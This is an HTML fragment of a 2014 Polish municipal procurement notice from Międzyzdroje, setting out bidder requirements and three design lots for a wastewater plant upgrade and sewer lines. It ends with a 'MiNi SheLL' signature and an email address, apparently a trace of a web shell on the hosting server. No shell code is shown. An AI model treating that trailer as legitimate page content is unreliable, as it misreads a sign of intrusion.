Zamawiający wyjaśnia, że uprawnienia budowlane dla części I, II ,III w zakresie dysponowania osobami zdolnymi do wykonania zamówienia są w  rozumieniu ustawy z dn. 7 lipca 1994 r. Prawo budowlane ( Dz. U. 2010 nr 243 poz. 1623 ze zm.) oraz Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie D.U. 2006 nr 83 poz. 578 ze zm.). Zamawiający akceptuje uprawnienia budowlane odpowiadające uprawnieniom wymaganym przez Zamawiającego, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zagraniczne uprawnienia uznane w zakresie i na zasadach opisanych w ustawie z dnia 18.03.2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Wykonawca musi wykazać, że wykonał należycie:
a/ CZĘŚĆ I warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej 2 usługi obejmujące swoim zakresem zaprojektowanie budowy lub/i przebudowy oczyszczalni ścieków komunalnych na kwotę min. 500 000,00 złotych brutto  każda z usług.
Wykonawca nie może sumować wartości kilku usług  o mniejszym zakresie dla uzyskania   
wymaganej  wartości porównywalnej.
b/ CZĘŚĆ II warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej 2 usługi obejmujące swoim zakresem zaprojektowanie budowy lub/i przebudowy lub/i wymiany kanalizacji sanitarnej za kwotę min.15 000 złotych brutto każda z usług.
Wykonawca nie może sumować wartości kilku usług  o mniejszym zakresie dla uzyskania   
wymaganej  wartości porównywalnej.
c/ CZĘŚĆ III warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, co najmniej 2 usługi obejmujące swoim zakresem zaprojektowanie budowy lub/i przebudowy lub/i wymiany kanalizacji sanitarnej za kwotę min.15 000 złotych brutto każda z usług. 
Wykonawca nie może sumować wartości kilku usług  o mniejszym zakresie dla uzyskania   
wymaganej  wartości porównywalnej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w 
postępowaniu na wiedzę i doświadczenie, potencjał techniczny, osoby zdolne do  
wykonania zamówienia lub zdolności finansowe innych podmiotów, niezależnie od 
charakteru prawnego łączącym go z nim stosunków, jest zobowiązany udowodnić                    zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji                   zamówienia, w szczególności przedstawiając pisemne zobowiązanie innych                   podmiotów do oddania mu do  dyspozycji niezbędnych zasobów na okres korzystania                   z nich przy wykonywaniu  zamówienia oraz dokumenty dotyczące: 
1/ zakresu dostępnych wykonawcy zasobów innego podmiotu, 
2/ sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy         
 wykonywaniu zamówienia, 
3/ charakteru stosunku, jaki będzie łączył wykonawcę z innymi podmiotami, 
4/ zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miedzyzdroje.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Międzyzdroje ul. Książąt Pommorskich 5 72-500 Mięzyzdroje.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2014 godzina 10:00, miejsce: Gmina Międzyzdroje 
ulica Książąt Pomorskich 5 
72 -500 Międzyzdroje 
Pokój nr 10 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany z Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 Priorytet  I Gospodarka wodno - ściekowa  Działanie 1.1. Gospodarka Wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje,
Część I: Wykonanie projektu budowlano-wykonawczego budowy i przebudowy oczyszczalni ścieków komunalnych w Międzyzdrojach ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I: Wykonanie projektu budowlano-wykonawczego budowy i przebudowy oczyszczalni ścieków komunalnych w Międzyzdrojach w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje.
1. Oczyszczalnia nie posiada kompleksowego rozwiązania gospodarki ściekowej i osadowej. Część obiektów jest wyeksploatowana i wymaga pilnej przebudowy lub remontu (komory wlotowej, komora pomp, punkt zrzutu nieczystości). Proponuje się, by przy tej okazji kierować się następującymi uwagami:
a) Zaprojektować piaskownik poziomy dwukomorowy napowietrzny z łapaczem olejów i tłuszczy. Orientacyjne wymiary w rzucie piaskownika: 20, 0 x 6, 0 m.
b)Zaprojektować zbiornik retencyjny ścieków surowych. Do zbiornika kierowane byłyby ścieki przy napływie powyżej 400 m3/h.
c)Zaprojektować komorę tlenowej lub beztlenowej stabilizacji osadu.
d)Obiekty b) i c) można zaprojektować na bazie istniejącego osadnika wstępnego (Imhoffa).
e)Zaprojektować rozbudowę stacji odwadniania osadu o zespół higienizacji osadu wapnem. Obecna prasa jest zbyt mała na potrzeby oczyszczalni - zaleca się jej wymianę na większą lub ustawienie drugiej prasy.
f)Zaprojektować kompostownię lub suszarnię osadu, co pozwoli na przyrodnicze lub rolnicze wykorzystanie osadu. W przypadku kompostowni jej powierzchnia wynosiłaby około 600 m2 (Np. 40 x 16 m).
g)Zaprojektować zbiornik magazynowy osadu.
h)Zaprojektować hermetyzacje źródeł odoru - proj. Piaskownik, proj. komora tlenowej lub beztlenowej stabilizacji osadu, proj. Zbiornik retencyjny ścieków surowych.
i)Zaprojektować montaż biofiltru.
UWAGI:
 W przypadku przystąpienia do wykonania koncepcji czy też projektu przebudowy obiektu konieczne jest wykonanie serii badań laboratoryjnych ścieków surowych oraz wielkości przepływów ścieków spływających na oczyszczalnię. 
Jest to szczególnie istotne w sytuacji zasygnalizowanej w obliczeniach wg ATV niewystarczającej redukcji azotu.
ROZBUODWA  REAKTORA  BIOLOGICZNEGO O STOPIEŃ DENITRYFIKACJI
Na etapie projektowym należy przewidzieć rozbudowę reaktora biologicznego o stopień denitryfikacji w celu zmniejszenia ilości azotanów w ściekach oraz osiągnięcia programowanych parametrów. 
MODERNIZACJA I REMONT BUDYNKÓW
Na etapie projektowym należy przewidzieć remont budynków wchodzących w skład obiektu oczyszczalni ścieków. Stan techniczny przedmiotowych obiektów jest niezadowalający. 
 CZĘŚĆ ELEKTRYCZNA.
 Zalecenia dotyczące urządzeń, rozdzielnic, sieci elektroenergetycznej w obiekcie Oczyszczalnia ścieków Międzyzdroje. Zalecenia te maja na celu poprawa warunków zasilania energią elektryczną w Oczyszczalni Ścieków Międzyzdroje poprzez, zagwarantowanie wyższej 
niezawodności dystrybucji energii oraz redukcje strat w sieci, oraz przeciwdziałanie możliwości powstania awarii mogącej zakłócić działanie Oczyszczalni Ścieków Międzyzdroje.
UKŁAD POMIAROWO-ROZLICZENIOWY W STACJI TRANSFORMATOROWEJ NR 2699.
Zaprojektować modernizację układu pomiarowo-rozliczeniowego zainstalowanego w stacji transformatorowej nr 2699. 
ROZDZIELNICA PRZEPOMPOWNI RP ( ZABUDOWANA W CENTRALNEJ PRZEPOMPOWNI ŚCIEKÓW).
Zaprojektować wymianę rozdzielnicy przepompowni RP. 
AGREGAT PRĄDOTWÓRCZY ( ZABUDOWANY W BUDYNKU STACJI TRANSFORMATOROWEJ NR 2669).
 Zaprojektować wymianę na agregatu na agregat nowszego typu np. AKMEL AP 275 z odprowadzeniem spalin z pomieszczenia. Niezbędne jest zastosowanie automatyki samoczynnego załączania rezerwy. Jednocześnie należy opracować i uzgodnić z Rejonem Dystrybucji Międzyzdroje Instrukcji współpracy agregatu z siecią zgodną z PN-IEC 60364-7-717:2004.
ZESTAWY GNIAZD REMONTOWYCH, PRZYŁĄCZA URZĄDZEŃ ZEWNĘTRZNYCH NA OBIEKCIE.
Zaprojektować wymianę rozdzielnic gniazd remontowych oraz przyłącza urządzeń umieszczonych na zewnątrz.
2. Koncepcję budowy i przebudowy oczyszczalni ścieków komunalnych w Międzyzdrojach.
3. Szczegółową inwentaryzację zadrzewienia z planem wycinki dla projektowanego terenu oczyszczalni.
4. Dokumentację projektową nasadzeń zieleni dla projektowanego terenu oczyszczalni,
-opracowanie inwentaryzacji zadrzewienia (wraz z wycinką) i zaprojektowanie nowych nasadzeni zieleni.
5. Dokumentację projektową (budowlano-wykonawczą) przebudowy istniejącego uzbrojenia podziemnego, obiektów i  urządzeń lub innych elementów kolidujących z przebudową projektowanych elementów oczyszczalni.
6. Wykonanie badań geotechnicznych.
7. Wykonanie wtórnika do celów projektowych w formie wektorowej wraz z mapą stanu władania oraz wypisem z rejestru gruntów.
8. Uzyskanie wszystkich opinii, pozwoleń, decyzji i uzgodnień, zgłoszeń robót, których dotyczy przedmiot zamówienia ponosi Wykonawca.
9. Wykonanie raportu oddziaływania na środowisko.
Przedmiot zamówienia jest współfinansowany z Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 Priorytet  I Gospodarka wodno - ściekowa  Działanie 1.1. Gospodarka Wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.33.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje,
Część II: Wykonanie projektu budowlano-wykonawczego budowy sieci kanalizacji sanitarnej w ulicy Nowomyśliwskiej od skrzyżowania z ulicą Garażową do skrzyżowania z ulicą Wolińską w Międzyzdrojach..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II: Wykonanie projektu budowlano-wykonawczego budowy sieci kanalizacji sanitarnej w ulicy Nowomyśliwskiej od skrzyżowania z ulicą Garażową do skrzyżowania z ulicąWolińską w Międzyzdrojach w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje.
1. W ul. Nowomyśliwskiej ( w zakresie od ronda do ul. Garażowej)
-  należy zaprojektować przepompownie ścieków w okolicy ronda ( w możliwie najniższym punkcie.) 
Pompownie ścieków należy zaprojektować, jako zbiornik podziemny z włazem zamykanym trudnym do podrobienia kluczem. 
Szafkę sterowniczą należy zaprojektować na oddzielnym fundamencie zlokalizowaną w bezpośrednim sąsiedztwie pompowni. 
Rurociąg tłoczny powinien pracować przy prędkości przepływu ścieków w przybliżeniu równej 1 m/s. Dopuszczalne graniczne prędkości przepływu w rurociągu (rurociągach) nie mogą być mniejsze niż 0,9 m/s, a maksymalne nie większe niż 2,5 - 3 m/s.
Dodatkowo rurociąg tłoczny i pompownię należy zaprojektować w taki sposób, aby co najmniej raz na dobę, przy jednym nieprzerwanym cyklu pracy pomp(y)) nastąpiło przepłukanie całej objętości rurociągu z prędkością nie mniejszą niż 0,9 m/s.
Wokół pompowni przewidzieć ogrodzenie z bramą zamykaną na klucz. Teren pompowni powinien być oświetlony.
Do każdej pompowni należy zaprojektować utwardzoną drogę dojazdową umożliwiającą dojazd do pompowni specjalistycznym pojazdom eksploatacyjnym będącym w posiadaniu Zamawiającego.
-  sieć kanalizacji grawitacyjne śr. Min fi 200, która umożliwi odprowadzenie ścieków sanitarnych z zabudowań i nieruchomości niezabudowanych w okolicy ronda, wraz z przyłączami.
- sieć kanalizacji ciśnieniowej 2 x fi 75 ( równolegle) na odcinku od projektowanej przepompowni do studni KS 1200 obok przepompowni ścieków ( skrzyżowanie z ul.  Garażową)wraz ze studnią rozprężną.
2. Koncepcję budowy sieci kanalizacji sanitarnej.
3. Dokumentację projektową (budowlano-wykonawczą) budowy sieci kanalizacji sanitarnej i przyłączy kanalizacji sanitarnej w tym również ewentualną przebudowę (zmiana lokalizacji) istniejących sieci i przyłączy podyktowaną koniecznością koordynacji lokalizacji sieci kanalizacji deszczowej, sanitarnej i wodociągowej w granicach obszaru projektowanej budowy kanalizacji sanitarnej, uwzględniającą przebudowę istniejącego uzbrojenia podziemnego w przypadku stwierdzenia kolizji infrastruktury podziemnej oraz nadziemnej.
4. Szczegółową inwentaryzację zadrzewienia z planem wycinki dla projektowanego obszaru.
5. Dokumentację projektową nasadzeń zieleni dla projektowanego obszaru ulic.
-opracowanie inwentaryzacji zadrzewienia (wraz z wycinką) i zaprojektowanie nowych nasadzeni zieleni.
6. Dokumentację projektową (budowlano-wykonawczą) przebudowy istniejącego uzbrojenia podziemnego, obiektów i urządzeń lub innych elementów kolidujących z przebudową projektowanej kanalizacji sanitarnej.
7. Wykonanie badań geotechnicznych.
8. Wykonanie wtórnika do celów projektowych w formie wektorowej wraz z mapą stanu władania oraz wypisem z rejestru gruntów.
9. Uzyskanie wszystkich opinii, pozwoleń, decyzji i uzgodnień, zgłoszeń robót, których dotyczy przedmiot zamówienia ponosi Wykonawca.
Przedmiot zamówienia jest współfinansowany z Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 Priorytet  I Gospodarka wodno - ściekowa  Działanie 1.1. Gospodarka Wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.22.00-1, 71.33.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje,
Część III: Wykonanie projektu budowlano-wykonawczego budowy sieci kanalizacji sanitarnej w ulicy Gryfa Pomorskiego Las od skrzyżowania z ulicą Polną do granicy Gminy Międzyzdroje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III: Wykonanie projektu budowlano-wykonawczego budowy sieci kanalizacji sanitarnej w ulicy Gryfa Pomorskiego Las od skrzyżowania z ulicą Polną do granicy Gminy Międzyzdroje, w ramach zadania pn. Uporządkowanie gospodarki ściekowej oraz modernizacja oczyszczalni ścieków na terenie aglom. Międzyzdroje.
1. W ul. Gryfa Pomorskiego Las ( w zakresie od ul. Polnej do granicy gminy)
-  należy zaprojektować przepompownie ścieków w możliwie najniższym pkt. 
Pompownie ścieków należy zaprojektować, jako zbiornik podziemny z włazem zamykanym trudnym do podrobienia kluczem. 
Szafkę sterowniczą należy zaprojektować na oddzielnym fundamencie zlokalizowaną w bezpośrednim sąsiedztwie pompowni. 
Rurociąg tłoczny powinien pracować przy prędkości przepływu ścieków w przybliżeniu równej 1 m/s. Dopuszczalne graniczne prędkości przepływu w rurociągu (rurociągach) nie mogą być mniejsze niż 0,9 m/s, a maksymalne nie większe niż 2,5 - 3 m/s.
Dodatkowo rurociąg tłoczny i pompownię należy zaprojektować w taki sposób, aby co najmniej raz na dobę, przy jednym nieprzerwanym cyklu pracy pomp(y)) nastąpiło przepłukanie całej objętości rurociągu z prędkością nie mniejszą niż 0,9 m/s.
Wokół pompowni przewidzieć ogrodzenie z bramą zamykaną na klucz. Teren pompowni powinien być oświetlony.
Do każdej pompowni należy zaprojektować utwardzoną drogę dojazdową umożliwiającą dojazd do pompowni specjalistycznym pojazdom eksploatacyjnym będącym w posiadaniu Zamawiającego.
-  sieć kanalizacji grawitacyjne śr. Min fi 200 wraz z przyłączami.
- sieć kanalizacji ciśnieniowej 2 x fi 75 ( równolegle) na odcinku od byłego ośrodka SPOŁEM do skrzyżowania z ul. Polną wraz ze studnią rozprężną.
2. Koncepcję budowy sieci kanalizacji sanitarnej.
3. Dokumentacje projektową (budowlano-wykonawczą) budowy sieci kanalizacji sanitarnej i przyłączy kanalizacji sanitarnej w tym również ewentualną przebudowę (zmiana lokalizacji) istniejących sieci i przyłączy podyktowaną koniecznością koordynacji lokalizacji sieci kanalizacji deszczowej, sanitarnej i wodociągowej w granicach obszaru projektowanej budowy kanalizacji sanitarnej, uwzględniającą przebudowę istniejącego uzbrojenia podziemnego w przypadku stwierdzenia kolizji infrastruktury podziemnej oraz nadziemnej.
4. Szczegółową inwentaryzację zadrzewienia z planem wycinki dla projektowanego obszaru.
5. Dokumentację projektową nasadzeń zieleni dla projektowanego obszaru ulic.
-opracowanie inwentaryzacji zadrzewienia (wraz z wycinką) i zaprojektowanie nowych nasadzeni zieleni.
6. Dokumentację projektową (budowlano-wykonawczą) przebudowy istniejącego uzbrojenia podziemnego, obiektów i urządzeń lub innych elementów kolidujących z przebudową projektowanej kanalizacji sanitarnej.
7. Wykonanie badań geotechnicznych.
8. Wykonanie wtórnika do celów projektowych w formie wektorowej wraz z mapą stanu władania oraz wypisem z rejestru gruntów.
9. Uzyskanie wszystkich opinii, pozwoleń, decyzji i uzgodnień, zgłoszeń robót, których dotyczy przedmiot zamówienia ponosi Wykonawca. 
                                                                                                     
Przedmiot zamówienia jest współfinansowany z Programu Operacyjnego Infrastruktura i Środowisko 2007 - 2013 Priorytet  I Gospodarka wodno - ściekowa  Działanie 1.1. Gospodarka Wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.32.20.00-1, 71.33.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com